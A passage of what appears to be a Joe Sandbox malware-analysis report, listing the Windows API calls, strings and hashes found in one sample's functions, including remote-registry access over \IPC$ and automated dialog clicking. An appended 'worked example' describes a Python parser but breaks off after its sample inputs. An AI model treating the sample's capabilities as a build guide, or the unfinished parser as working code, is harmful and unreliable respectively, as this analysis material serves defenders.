                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 43e6f365c57b5cdcc194d3ad57ff010194e88956cb7e854697f9543223394fce
                                                  • Instruction ID: 0567dcb9497614b6b5015656793c0e1f120ff8241df2a09374f25998400afa00
                                                  • Opcode Fuzzy Hash: 43e6f365c57b5cdcc194d3ad57ff010194e88956cb7e854697f9543223394fce
                                                  • Instruction Fuzzy Hash: FE610275D0021AEFCF14CFA4D885AAEBBF6FF48310F248529E955A7250D730A951CFA4
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 005CDAA1
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD659
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD66B
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD67D
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD68F
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6A1
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6B3
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6C5
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6D7
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6E9
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD6FB
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD70D
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD71F
                                                    • Part of subcall function 005CD63C: _free.LIBCMT ref: 005CD731
                                                  • _free.LIBCMT ref: 005CDA96
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005CDAB8
                                                  • _free.LIBCMT ref: 005CDACD
                                                  • _free.LIBCMT ref: 005CDAD8
                                                  • _free.LIBCMT ref: 005CDAFA
                                                  • _free.LIBCMT ref: 005CDB0D
                                                  • _free.LIBCMT ref: 005CDB1B
                                                  • _free.LIBCMT ref: 005CDB26
                                                  • _free.LIBCMT ref: 005CDB5E
                                                  • _free.LIBCMT ref: 005CDB65
                                                  • _free.LIBCMT ref: 005CDB82
                                                  • _free.LIBCMT ref: 005CDB9A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 29406ed0793761367eefcfd10d582729a4fd44a28e3146a5e8fd1a6ade1a5490
                                                  • Instruction ID: a23ae44a02533aaf8df29e70ad1b5493e994412dbab989d08e7f27661db10db5
                                                  • Opcode Fuzzy Hash: 29406ed0793761367eefcfd10d582729a4fd44a28e3146a5e8fd1a6ade1a5490
                                                  • Instruction Fuzzy Hash: 183117316046069FEB21AAB9EC49F5ABFE9FF40325F15442DE449D7191DA35AC808B30
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 005F369C
                                                  • _wcslen.LIBCMT ref: 005F36A7
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005F3797
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 005F380C
                                                  • GetDlgCtrlID.USER32(?), ref: 005F385D
                                                  • GetWindowRect.USER32(?,?), ref: 005F3882
                                                  • GetParent.USER32(?), ref: 005F38A0
                                                  • ScreenToClient.USER32(00000000), ref: 005F38A7
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 005F3921
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 005F395D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                  • String ID: %s%u
                                                  • API String ID: 4010501982-679674701
                                                  • Opcode ID: f276ee59fcda7d06997a03fb487e7b502eb6c73a7834db67c7cabb56dd7ac258
                                                  • Instruction ID: bab4b2c8c9f82ff3e480f9149d9d06ab5993d599416d2fa44437bb27aa66fe10
                                                  • Opcode Fuzzy Hash: f276ee59fcda7d06997a03fb487e7b502eb6c73a7834db67c7cabb56dd7ac258
                                                  • Instruction Fuzzy Hash: 4691D77120560AAFE719DF24C885FFAFBA9FF44350F004519FA99C2190DB78EA45CB91
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 005F4994
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 005F49DA
                                                  • _wcslen.LIBCMT ref: 005F49EB
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 005F49F7
                                                  • _wcsstr.LIBVCRUNTIME ref: 005F4A2C
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 005F4A64
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 005F4A9D
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 005F4AE6
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 005F4B20
                                                  • GetWindowRect.USER32(?,?), ref: 005F4B8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                   • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                  • String ID: ThumbnailClass
                                                  • API String ID: 1311036022-1241985126
                                                  • Opcode ID: 689bdbe4d7226e85ba27c117fafea35b9a21bbb7b5cdcab52b035fa66400e43b
                                                  • Instruction ID: 44075fc8164f928a387ffaa2db2858e867ea7fc4c7324f28f5214a396115260f
                                                  • Opcode Fuzzy Hash: 689bdbe4d7226e85ba27c117fafea35b9a21bbb7b5cdcab52b035fa66400e43b
                                                  • Instruction Fuzzy Hash: 64919C3110420A9FDB14CF14C985BBB7BA9FF84354F048469FE859A096EB38ED45CFA1
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0061CC64
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0061CC8D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0061CD48
                                                    • Part of subcall function 0061CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0061CCAA
                                                    • Part of subcall function 0061CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0061CCBD
                                                    • Part of subcall function 0061CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0061CCCF
                                                    • Part of subcall function 0061CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0061CD05
                                                    • Part of subcall function 0061CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0061CD28
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0061CCF3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2734957052-4033151799
                                                  • Opcode ID: ec1684d7cba7f245f9a78fc6228634b264b18dd2fbe95ba153ae1761a05066ed
                                                  • Instruction ID: 6ec19cc07b534e8c79ea806bf6d9c526b091c3eaf9f4fcd3567af37d275a1952
                                                  • Opcode Fuzzy Hash: ec1684d7cba7f245f9a78fc6228634b264b18dd2fbe95ba153ae1761a05066ed
                                                  • Instruction Fuzzy Hash: 87318C71941129BBDB308B55EC88EFFBB7EEF45760F040165A906E2240DA709E86DAE0
                                                  APIs
                                                  • timeGetTime.WINMM ref: 005FE6B4
                                                    • Part of subcall function 005AE551: timeGetTime.WINMM(?,?,005FE6D4), ref: 005AE555
                                                  • Sleep.KERNEL32(0000000A), ref: 005FE6E1
                                                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 005FE705
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005FE727
                                                  • SetActiveWindow.USER32 ref: 005FE746
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005FE754
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 005FE773
                                                  • Sleep.KERNEL32(000000FA), ref: 005FE77E
                                                  • IsWindow.USER32 ref: 005FE78A
                                                  • EndDialog.USER32(00000000), ref: 005FE79B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 1eed6e05fcac29509e65faf3017dd1c581b1dd2d23199d4062c5c5a369c85915
                                                  • Instruction ID: 25cb254a78e261f4751b9ac73de8195d2d905f2303743174e123e6d958f12e76
                                                  • Opcode Fuzzy Hash: 1eed6e05fcac29509e65faf3017dd1c581b1dd2d23199d4062c5c5a369c85915
                                                  • Instruction Fuzzy Hash: A521F670200A4AAFFB106F24EC9FA393F6BF755758F002425F602D11B1DBB59C519B20
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 005FEA5D
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 005FEA73
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 005FEA84
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 005FEA96
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005FEAA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: SendString$_wcslen
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2420728520-1007645807
                                                  • Opcode ID: 2da9a08bab6c240941a51289f3748adbac1216831238bc853f98fd6f5162abb8
                                                  • Instruction ID: b9eed99eb5fcbe691b6dd2672a763399319ca111c4e1f9579d3b8cb775dae32f
                                                  • Opcode Fuzzy Hash: 2da9a08bab6c240941a51289f3748adbac1216831238bc853f98fd6f5162abb8
                                                  • Instruction Fuzzy Hash: A2114F61A9021AB9DB20A7A5DC4EDFF6E7DFBD1F41F4105297951A20E1EAB00D09C5B0
                                                  APIs
                                                    • Part of subcall function 005A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005A8BE8,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005A8FC5
                                                  • DestroyWindow.USER32(?), ref: 005A8C81
                                                  • KillTimer.USER32(00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005A8D1B
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 005E6973
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005E69A1
                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000,?), ref: 005E69B8
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,005A8BBA,00000000), ref: 005E69D4
                                                  • DeleteObject.GDI32(00000000), ref: 005E69E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 3506c2f96a976fef173fbc767caeebb7dcaf0237277db33bffa419d025eaa4f7
                                                  • Instruction ID: fc191133e779ec3a9eaf4a55cb2c321f0753a71dffb097d06c96f86751412025
                                                  • Opcode Fuzzy Hash: 3506c2f96a976fef173fbc767caeebb7dcaf0237277db33bffa419d025eaa4f7
                                                  • Instruction Fuzzy Hash: A4619C30502A41DFCB399F15D968B3D7FF2FB523A2F185928E0829A560CB71AD91CF90
                                                  APIs
                                                    • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
                                                  • GetSysColor.USER32(0000000F), ref: 005A9862
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 03183eb76681610d85c35f795ee650d92727e765833faf2255a8be48e726e710
                                                  • Instruction ID: ee81525f3ed84b0f3109649374916e44df8e0d1643ca8c4671c0d10337414849
                                                  • Opcode Fuzzy Hash: 03183eb76681610d85c35f795ee650d92727e765833faf2255a8be48e726e710
                                                  • Instruction Fuzzy Hash: C9419E31104A65AFDB309F389C89BBE3FA6BB07330F144605F9A28B1E1C6399C52DB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .[
                                                  • API String ID: 0-1428149938
                                                  • Opcode ID: c588b9fb0a7a2f9d4959cc73ddc378665d4dc476bd6f0ebb8b4986598e034230
                                                  • Instruction ID: 1522cb8490a9cd9a4ebfffa4b32740fbc8380e9a4ec5e996f4bfe5215709f3d5
                                                  • Opcode Fuzzy Hash: c588b9fb0a7a2f9d4959cc73ddc378665d4dc476bd6f0ebb8b4986598e034230
                                                  • Instruction Fuzzy Hash: 22C1BC79A0424AAFDB119FE8CC49FEDBFB5BF49310F08409DE815A7292C7749941CB61
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,005DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 005F9717
                                                  • LoadStringW.USER32(00000000,?,005DF7F8,00000001), ref: 005F9720
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,005DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 005F9742
                                                  • LoadStringW.USER32(00000000,?,005DF7F8,00000001), ref: 005F9745
                                                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 005F9866
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 747408836-2268648507
                                                  • Opcode ID: d2926793e07f6f910a32a29e280f59f89577894e2161415b266733522bb937e3
                                                  • Instruction ID: f349c2da16c6938a6165db1309959630d50822f7d762f5e3c603138ecde153d1
                                                  • Opcode Fuzzy Hash: d2926793e07f6f910a32a29e280f59f89577894e2161415b266733522bb937e3
                                                  • Instruction Fuzzy Hash: F841407280060AAACF04EBE4DD4AEFE7B79BF95340F504429F60572091EB755F48CB61
                                                  APIs
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005F07A2
                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005F07BE
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005F07DA
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005F0804
                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 005F082C
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F0837
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F083C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                  • API String ID: 323675364-22481851
                                                  • Opcode ID: 18875ebe16bf74ed31227001e324c024ab77795c253b8d5802c2bfbf5a908521
                                                  • Instruction ID: 476ad12a9cddbbb0fbcf11c0b2e4544bd539728ccf8befff09d0944d66cf69e1
                                                  • Opcode Fuzzy Hash: 18875ebe16bf74ed31227001e324c024ab77795c253b8d5802c2bfbf5a908521
                                                  • Instruction Fuzzy Hash: 61411672C1022DABDF21EBA4DC99CEDBB79FF44350F144169E901A31A1EB349E04CBA0
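Worked example, added here by the editor and not part of the Joe Sandbox report or its IDA plugin: a small Python parser for the "APIs" bullet lines of function entries like the two above (the timing/dialog chain at 005FE6B4 and the remote-registry CLSID lookup at 005F07A2). It turns each bullet into a call record, separates a function's own calls from the indented "Part of subcall function" lines, names the hex constants the report leaves raw where the value is certain (BM_CLICK 0xF5, WM_CLOSE 0x10, HKEY_LOCAL_MACHINE 0x80000002, KEY_READ 0x20019), and flags the two chains an analyst would want to see first. The sample input is copied from those two entries; the rule for locating the message id in a SendMessageW line whose unresolved hwnd argument was dropped, and the wording of the chain labels, are assumptions of this example.

```python
"""Parse the "APIs" bullet lines of a Joe Sandbox function entry, decode the raw
hex constants that matter for triage, and flag two call chains seen on this page.
Added example for this page; not part of the report or the Joe Sandbox IDA plugin."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input, copied from the two entries above: the timing/dialog chain
# at 005FE6B4 and the remote-registry CLSID lookup at 005F07A2.
SAMPLE_DIALOG = """\
• timeGetTime.WINMM ref: 005FE6B4
  • Part of subcall function 005AE551: timeGetTime.WINMM(?,?,005FE6D4), ref: 005AE555
• Sleep.KERNEL32(0000000A), ref: 005FE6E1
• EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 005FE705
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005FE727
• SetActiveWindow.USER32 ref: 005FE746
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005FE754
• SendMessageW.USER32(00000010,00000000,00000000), ref: 005FE773
• Sleep.KERNEL32(000000FA), ref: 005FE77E
• IsWindow.USER32 ref: 005FE78A
• EndDialog.USER32(00000000), ref: 005FE79B
"""
SAMPLE_REMOTE_REG = r"""
  • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005F07A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005F07BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005F07DA
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005F0804
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 005F082C
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F0837
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005F083C
"""

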